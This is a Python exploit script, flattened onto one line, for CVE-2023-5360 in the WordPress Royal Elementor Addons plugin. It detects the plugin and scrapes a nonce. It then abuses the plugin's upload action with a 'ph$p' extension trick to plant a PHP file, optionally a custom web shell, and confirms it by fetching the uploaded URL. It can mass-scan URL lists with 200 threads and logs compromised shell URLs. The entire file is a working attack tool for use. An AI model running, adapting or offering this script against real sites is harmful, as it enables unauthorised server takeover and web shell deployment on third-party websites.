import re import json import random import string import argparse import requests from rich.console import Console from alive_progress import alive_bar from concurrent.futures import ThreadPoolExecutor, as_completed class WPVulnScanner: def __init__(self, verbose=False, custom_file=None, output_file=None, timeout=10, threads=200): self.session = requests.Session() self.headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "PoC": "https://github.com/Chocapikk/CVE-2023-5360" } self.verbose = verbose self.custom_file = custom_file self.output_file = output_file self.timeout = timeout self.threads = threads self.console = Console() request_package = requests.packages.urllib3 request_package.disable_warnings(request_package.exceptions.InsecureRequestWarning) def custom_print(self, message, header, verbose_required=False): header_colors = { "+": "green", "-": "red", "!": "yellow", "*": "blue" } if not verbose_required or (verbose_required and self.verbose): self.console.print(f"[bold {header_colors[header]}][{header}][/bold {header_colors[header]}] {message}") def _write_output(self, url): if self.output_file: with open(self.output_file, 'a') as file: file.write(url + '\n') def _get_nonce(self, url): response, _ = self._make_request(url) match = re.search("var\s+WprConfig\s*=\s*({.*?});", response.text) if match: nonce_json = json.loads(match.group(1)) return nonce_json.get("nonce") return None def _make_request(self, url, nonce=None): try: random_content = None new_nonce = None if nonce: new_nonce = ''.join(random.choices(string.ascii_letters + string.digits, k=10)) random_content = '' if self.custom_file: with open(self.custom_file, 'rb') as f: file_content = random_content.encode('utf-8') + f.read() else: file_content = random_content.encode('utf-8') if self.custom_file: self.custom_print(f"Sending request with payload from file: {self.custom_file}", "*", verbose_required=True) else: self.custom_print(f"Sending request with payload: {random_content}", "*", verbose_required=True) files = { "uploaded_file": ("poc.ph$p", file_content) } data = { "action": "wpr_addons_upload_file", "max_file_size": 0, "allowed_file_types": "ph$p", "triggering_event": "click", "wpr_addons_nonce": nonce } response = self.session.post(url, headers=self.headers, files=files, data=data, verify=False, timeout=self.timeout) else: response = self.session.get(url, headers=self.headers, verify=False, timeout=self.timeout) return response, new_nonce except requests.exceptions.RequestException as e: self.custom_print(f"Request error for {url}: {e}", "-", verbose_required=True) finally: if response: response.close() return None, None def plugin_exists(self, url): readme_url = f"{url}/wp-content/plugins/royal-elementor-addons/readme.txt" response, _ = self._make_request(readme_url) if response and response.status_code == 200: return "royal-elementor-addons" in response.text return False def check_vulnerability(self, url): try: if not self.plugin_exists(url): self.custom_print(f"Plugin 'royal-elementor-addons' not found at {url}. Skipping...", "-", verbose_required=True) return None self.custom_print(f"Scanning {url}", "*", verbose_required=True) nonce = self._get_nonce(url) if nonce: self.custom_print(f"Nonce found: {nonce}", "!", verbose_required=True) if nonce: ajax_url = f"{url}/wp-admin/admin-ajax.php" response, new_nonce = self._make_request(ajax_url, nonce) if response is None: self.custom_print(f"No response received for {url}", "-", verbose_required=True) return None self.custom_print(f"Sent request to {ajax_url} with nonce: {nonce}", "*", verbose_required=True) try: json_response = json.loads(response.text) except json.JSONDecodeError: self.custom_print(f"Unexpected server response for {url}. Not vulnerable.", "-", verbose_required=True) return None if json_response and json_response.get("success"): shell_url = json_response["data"]["url"] shell_response, _ = self._make_request(shell_url) if shell_response.status_code == 200 and new_nonce.strip() in shell_response.text.strip(): self._write_output(shell_url) return (f"CVE-2023-5360 detected for {shell_url}", "+") else: self.custom_print(f"Failed to upload shell for {url}", "-", verbose_required=True) else: self.custom_print(f"No nonce found for {url}", "-", verbose_required=True) except Exception as e: self.custom_print(f"Error during vulnerability check for {url}: {e}", "-", verbose_required=True) return None def initialize_options(): parser = argparse.ArgumentParser(description="WordPress Royal Elementor Addons and Templates Exploit (CVE-2023-5360)") group = parser.add_mutually_exclusive_group(required=True) group.add_argument("-u", "--url", help="Scan a single URL") group.add_argument("-l", "--list", help="Scan a list of URLs from a file") parser.add_argument("-v", "--verbose", help="Verbose mode (only with -u/--url)", action="store_true") parser.add_argument("-o", "--output", help="Output file to save vulnerable URLs") parser.add_argument("-f", "--file", help="Custom PHP file to upload", default=None) parser.add_argument("-t", "--threads", help="Number of threads to use", default=200, type=int) parser.add_argument("-T", "--timeout", help="Request timeout in seconds", default=10, type=int) return parser.parse_args() def main(): args = initialize_options() scanner = WPVulnScanner(verbose=args.verbose, custom_file=args.file, output_file=args.output) if args.url: result = scanner.check_vulnerability(args.url) if result: scanner.custom_print(result[0], result[1]) elif args.list: with open(args.list, 'r') as file: raw_urls = [url.strip() for url in file.readlines()] unique_urls = {} for url in raw_urls: domain = url.split("//")[-1].split("/")[0].replace('www.', '') if domain not in unique_urls: unique_urls[domain] = url urls = list(unique_urls.values()) with ThreadPoolExecutor(max_workers=scanner.threads) as executor, alive_bar(len(urls), bar='smooth', enrich_print=False) as bar: futures = {executor.submit(scanner.check_vulnerability, url): url for url in urls} for future in as_completed(futures): result = future.result() if result: scanner.custom_print(result[0], result[1]) bar() if __name__ == "__main__": main()